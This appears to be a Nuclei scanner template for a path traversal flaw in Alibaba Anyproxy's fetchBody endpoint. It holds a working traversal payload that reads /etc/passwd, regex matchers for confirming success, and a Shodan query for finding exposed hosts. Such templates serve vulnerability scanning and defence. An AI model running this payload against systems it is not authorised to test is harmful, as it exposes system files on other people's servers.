id: alibaba-anyproxy-lfi

info:
  name: Alibaba Anyproxy fetchBody File - Path Traversal
  author: DhiyaneshDk
  severity: high
  description: Alibaba Anyproxy is vulnerable to Path Traversal.
  reference:
    - https://github.com/alibaba/anyproxy/issues/391
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"anyproxy"
  tags: alibaba,anyproxy,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/fetchBody?id=1/../../../../../../../../etc/passwd"

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(body, '\"id\":')
          - status_code == 200
        condition: and
# digest: 490a00463044022068deda934b82dc15a20aeece7b291bec783b3071a5e5e18902003c757c07b43802204c69872aeb22e0f649667a5e13377d6762a4a361898e5eac70d24b63bb360472:922c64590222798bb761d5b6d8e72950